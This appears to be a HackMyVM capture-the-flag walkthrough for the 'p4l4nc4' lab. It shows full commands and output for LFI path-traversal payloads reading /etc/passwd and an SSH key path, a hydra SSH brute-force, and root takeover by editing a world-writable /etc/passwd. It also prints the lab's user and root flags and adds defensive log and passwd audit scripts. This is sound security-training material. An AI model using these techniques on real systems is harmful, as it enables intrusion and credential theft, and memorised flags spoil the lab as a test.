HackMyVM-p4l4nc4-Walkthrough
Author: 城南花已开

Information gathering

Service probing

sudo arp-scan -l
[sudo] password for Pepster:
Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.60.100
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.60.1 00:50:56:c0:00:08 VMware, Inc.
192.168.60.2 00:50:56:e3:f6:57 VMware, Inc.
192.168.60.199 08:00:27:42:5a:bb PCS Systemtechnik GmbH
192.168.60.254 00:50:56:e3:9f:ef VMware, Inc.

7 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.036 seconds (125.74 hosts/sec). 4 responded
export ip=192.168.60.199
❯ rustscan -a $ip
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
I don't always scan ports, but when I do, I prefer RustScan.

[~] The config file is expected to be at "/home/Pepster/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.60.199:22
Open 192.168.60.199:80
[~] Starting Script(s)
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-22 12:41 CST
Initiating ARP Ping Scan at 12:41
Scanning 192.168.60.199 [1 port]
Completed ARP Ping Scan at 12:41, 0.06s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 12:42
Completed Parallel DNS resolution of 1 host. at 12:42, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 3, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 12:42
Scanning 192.168.60.199 [2 ports]
Discovered open port 80/tcp on 192.168.60.199
Discovered open port 22/tcp on 192.168.60.199
Completed SYN Stealth Scan at 12:42, 0.04s elapsed (2 total ports)
Nmap scan report for 192.168.60.199
Host is up, received arp-response (0.00032s latency).
Scanned at 2025-02-22 12:42:00 CST for 0s

PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 64
80/tcp open http syn-ack ttl 64
MAC Address: 08:00:27:42:5A:BB (Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.28 seconds
Raw packets sent: 3 (116B) | Rcvd: 3 (116B)

Scan for directories

❯ gobuster dir -u http://$ip -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -x php,html,zip,txt -b 403,404
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.60.199
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes: 403,404
[+] User Agent: gobuster/3.6
[+] Extensions: html,zip,txt,php
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.html (Status: 200) [Size: 10701]
/robots.txt (Status: 200) [Size: 1432]
Progress: 1038215 / 1038220 (100.00%)
===============================================================
Finished
===============================================================

robots.txt contains a hint

❯ curl http://192.168.60.199/robots.txt
A palanca-negra-gigante é uma subespécie de palanca-negra. De todas as subespécies, esta destaca-se pelo grande tamanho, sendo um dos ungulados africanos mais raros. Esta subespécie é endémica de Angola, apenas existindo em dois locais, o Parque Nacional de Cangandala e a Reserva Natural Integral de Luando. Em 2002, após a Guerra Civil Angolana, pouco se conhecia sobre a sobrevivência de múltiplas espécies em Angola e, de facto, receava-se que a Palanca Negra Gigante tivesse desaparecido. Em janeiro de 2004, um grupo do Centro de Estudos e Investigação Científica da Universidade Católica de Angola, liderado pelo Dr. Pedro vaz Pinto, obteve as primeiras evidências fotográficas do único rebanho que restava no Parque Nacional de Cangandala, ao sul de Malanje, confirmando-se assim a persistência da população após um duro período de guerra.
Atualmente, a Palanca Negra Gigante é considerada como o símbolo nacional de Angola, sendo motivo de orgulho para o povo angolano. Como prova disso, a seleção de futebol angolana é denominada de palancas-negras e a companhia aérea angolana, TAAG, tem este antílope como símbolo. Palanca é também o nome de uma das subdivisões da cidade de Luanda, capital de Angola. Na mitologia africana, assim como outros antílopes, eles simbolizam vivacidade, velocidade, beleza e nitidez visual
The giant sable antelope is a subspecies of the sable antelope. Among all subspecies it stands out for its great size, and it is one of Africa's rarest ungulates. The subspecies is endemic to Angola and exists in only two places, Cangandala National Park and the Luando Nature Reserve. In 2002, after the Angolan Civil War, little was known about the survival of many species in Angola, and it was in fact feared that the giant sable antelope had become extinct. In January 2004, a team from the Centre for Scientific Studies and Research of the Catholic University of Angola, led by Dr. Pedro vaz Pinto, obtained the first photographic evidence of the only remaining herd in Cangandala National Park, south of Malanje, confirming that the population had persisted through the hard period after the war.
Today the giant sable antelope is considered the national symbol of Angola and a source of pride for the Angolan people. As proof of this, the Angolan national football team is called the "palancas-negras", and the Angolan airline TAAG uses this antelope as its emblem. Palanca is also the name of one of the districts of Luanda, the capital of Angola. In African mythology, like other antelopes, they symbolise vitality, speed, beauty and sharp vision.

Searching for the original text directly shows that it comes from Wikipedia.

image

Leet

Here you can make a guess based on the machine name p4l4nc4:

it points to a substitution cipher, also known as leet,

where a can become 4 and e can become 3.

image

So after generating a wordlist with cewl, process the words.


You can also use the script from Analogman:

#!/bin/bash

# Verify that a file was provided as an argument.
if [ "$#" -ne 1 ]; then
    echo "Use: $0 dic.txt"
    exit 1
fi

# Input/output files
file_input="$1"
file_output="dic_1337.txt"

# Transformations in basic 1337 format using the sed tool.
# The expressions are applied in order, so both "i" and "l" become "1".
# The input file must follow the last "\" directly: a blank line there
# would end the sed command early and try to execute the wordlist.
sed -e 's/a/4/g' \
    -e 's/e/3/g' \
    -e 's/i/1/g' \
    -e 's/l/1/g' \
    -e 's/o/0/g' \
    -e 's/s/5/g' \
    -e 's/t/7/g' \
    "$file_input" > temp_1337.txt

# Merge original and transformed words, removing duplicates and unnecessary capital letters:
cat "$file_input" temp_1337.txt | tr '[:upper:]' '[:lower:]' | sort | uniq > "$file_output"

# Clean temp file
rm temp_1337.txt

# Show success
echo "The dictionary in 1337 format was saved in: $file_output"

Scan directories again

❯ cewl -w dic.txt http://192.168.60.199/robots.txt
cat dic.txt|grep -P '\w+' -o|sort|uniq|sed -re 's/e/3/gi' -e 's/a/4/gi' -re 's/i|l/1/gi'|tr A-Z a-z > tmp1
❯ gobuster dir -u http://$ip -w tmp1 -x php,html,zip,txt,png,jpg,webp -b 403,404
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.60.199
[+] Method: GET
[+] Threads: 10
[+] Wordlist: tmp1
[+] Negative Status codes: 403,404
[+] User Agent: gobuster/3.6
[+] Extensions: html,zip,txt,png,jpg,webp,php
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/n3gr4 (Status: 301) [Size: 316] [--> http://192.168.60.199/n3gr4/]
/n3gr4 (Status: 301) [Size: 316] [--> http://192.168.60.199/n3gr4/]
Progress: 1056 / 1064 (99.25%)
===============================================================
Finished
===============================================================

Scanning the second-level directory yields /m414nj3.php

❯ gobuster dir -u http://$ip/n3gr4 -w tmp1 -x php,html,zip,txt,png,jpg,webp -b 403,404
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.60.199/n3gr4
[+] Method: GET
[+] Threads: 10
[+] Wordlist: tmp1
[+] Negative Status codes: 403,404
[+] User Agent: gobuster/3.6
[+] Extensions: png,jpg,webp,php,html,zip,txt
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/m414nj3.php (Status: 500) [Size: 0]
Progress: 1056 / 1064 (99.25%)
===============================================================
Finished
===============================================================

LFI

Visiting it only returns a 500.

Fuzz it to see whether it has an LFI vulnerability

❯ wfuzz -c -u "http://$ip/n3gr4/m414nj3.php?FUZZ=../../../../ect/passwd" -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories-lowercase.txt
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************

Target: http://192.168.60.199/n3gr4/m414nj3.php?FUZZ=../../../../ect/passwd
Total requests: 26584

=====================================================================
ID Response Lines Word Chars Payload
=====================================================================

000000064: 200 0 L 0 W 0 Ch "page"


The page parameter returns 200

❯ curl http://192.168.60.199//n3gr4/m414nj3.php\?page\=../../../../etc/passwd |grep /bin/bash
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 100 1066 100 1066 0 0 437k 0 --:--:-- --:--:-- --:--:-- 520k
root:x:0:0:root:/root:/bin/bash
p4l4nc4:x:1000:1000:p4l4nc4,,,:/home/p4l4nc4:/bin/bash

Exploit it to get the private key file

❯ curl http://192.168.60.199//n3gr4/m414nj3.php\?page\=../../../../home/p4l4nc4/.ssh/id_rsa
-----BEGIN OPENSSH PRIVATE KEY-----
-----END OPENSSH PRIVATE KEY-----
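As an added example (not from the original walkthrough), here is a small POSIX shell checker that flags access-log requests carrying the kind of traversal payload sent to m414nj3.php?page=... above, including percent-encoded variants; the log lines below are constructed.

```shell
#!/bin/sh
# Added example, not part of the original walkthrough: detect directory
# traversal attempts (../ and its URL-encoded forms) in web server logs.

# Decode the common percent-encodings of ".", "/" and "\" and then look
# for a "../" or "..\" sequence. Returns 0 when the line looks like a
# traversal attempt, 1 otherwise.
is_traversal() {
    printf '%s\n' "$1" \
      | sed -e 's/%2[eE]/./g' -e 's/%2[fF]/\//g' -e 's/%5[cC]/\\/g' \
      | grep -Eq '\.\.[/\\]'
}

# Print every flagged line of an access log (one request per line).
scan_log() {
    while IFS= read -r line; do
        if is_traversal "$line"; then
            printf '%s\n' "$line"
        fi
    done < "$1"
}

# Number of flagged lines, so the result can be checked rather than read.
count_hits() {
    scan_log "$1" | wc -l | tr -d ' '
}

# Constructed sample in Apache combined-log style: the two requests that
# mirror the LFI above, plus two harmless ones.
SAMPLE_LOG=$(mktemp)
cat > "$SAMPLE_LOG" <<'EOF'
192.168.60.100 - - [22/Feb/2025:12:50:01 +0800] "GET /n3gr4/m414nj3.php?page=../../../../etc/passwd HTTP/1.1" 200 1066
192.168.60.100 - - [22/Feb/2025:12:50:02 +0800] "GET /n3gr4/m414nj3.php?page=%2e%2e%2f%2e%2e%2fetc%2fpasswd HTTP/1.1" 200 1066
192.168.60.100 - - [22/Feb/2025:12:50:03 +0800] "GET /index.html HTTP/1.1" 200 10701
192.168.60.100 - - [22/Feb/2025:12:50:04 +0800] "GET /robots.txt HTTP/1.1" 200 1432
EOF

echo "traversal attempts in $SAMPLE_LOG: $(count_hits "$SAMPLE_LOG")"
scan_log "$SAMPLE_LOG"
```

Double-encoded payloads (%252e) are not decoded here; a second sed pass would be needed for those.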

Trying to connect with it still asks for a password; my guess is that the .ssh permissions are too loose.

User privilege escalation

Try brute-forcing SSH; the password is friendster

❯ hydra -l p4l4nc4 -P /usr/share/wordlists/rockyou.txt ssh://$ip -I
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-02-22 13:52:06
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://192.168.60.199:22/
[STATUS] 230.00 tries/min, 230 tries in 00:01h, 14344176 to do in 1039:26h, 9 active
[STATUS] 173.67 tries/min, 521 tries in 00:03h, 14343885 to do in 1376:35h, 9 active
[22][ssh] host: 192.168.60.199 login: p4l4nc4 password: friendster
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 6 final worker threads did not complete until end.
[ERROR] 6 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-02-22 13:55:44

Connect; the user flag could in fact also have been read through the LFI above

❯ ssh p4l4nc4@$ip
p4l4nc4@192.168.60.199's password:
Linux 4ng014 6.1.0-27-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.115-1 (2024-11-01) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Wed Nov 13 17:10:08 2024 from 192.168.1.78
p4l4nc4@4ng014:~$ cat user.txt
HMV{6cfb952777b95ded50a5be3a4ee9417af7e6dcd1}

Root privilege escalation

Looking around reveals that /etc/passwd has permissions 666

Simply edit the file and delete the x after root

p4l4nc4@4ng014:/tmp$ ls -al /etc/passwd
-rw-rw-rw- 1 root root 1066 Nov 13 12:28 /etc/passwd
p4l4nc4@4ng014:/tmp$ vi /etc/passwd
p4l4nc4@4ng014:/tmp$ su root
root@4ng014:/tmp# cat /root/root.txt
HMV{4c3b9d0468240fbd4a9148c8559600fe2f9ad727}
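Added example, not part of the original walkthrough: a POSIX shell audit for the two conditions abused here, a world-writable passwd file and an account whose password field has been emptied. The sample file is constructed, and the checks rely only on ls and awk.

```shell
#!/bin/sh
# Added example, not from the original walkthrough: audit a passwd-format
# file for the misconfiguration exploited above.

# Returns 0 if the file is writable by its group or by others
# (ls -l columns 6 and 9), 1 otherwise. /etc/passwd should be 644.
is_world_writable() {
    perms=$(ls -l "$1" | cut -c1-10)
    case "$perms" in
        ?????w*|????????w?) return 0 ;;
    esac
    return 1
}

# Print accounts whose second field is empty: "su" to them prompts for
# no password at all, which is exactly what deleting root's "x" achieves.
empty_password_accounts() {
    awk -F: '$2 == "" { print $1 }' "$1"
}

# Run both checks; returns 1 if anything is wrong, 0 if the file is clean.
audit_passwd() {
    file=${1:-/etc/passwd}
    status=0
    if is_world_writable "$file"; then
        echo "WARN: $file is writable by non-root users ($(ls -l "$file" | cut -c1-10)); expected -rw-r--r--"
        status=1
    fi
    for user in $(empty_password_accounts "$file"); do
        echo "WARN: account '$user' in $file has an empty password field"
        status=1
    done
    return $status
}

# Constructed sample reproducing the post-exploitation state shown above:
# mode 666 and root's password field emptied.
SAMPLE=$(mktemp)
printf '%s\n' 'root::0:0:root:/root:/bin/bash' \
              'p4l4nc4:x:1000:1000:p4l4nc4,,,:/home/p4l4nc4:/bin/bash' > "$SAMPLE"
chmod 666 "$SAMPLE"
audit_passwd "$SAMPLE" || echo "audit failed for $SAMPLE"
```

Run it as `audit_passwd` with no argument to check the live /etc/passwd.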
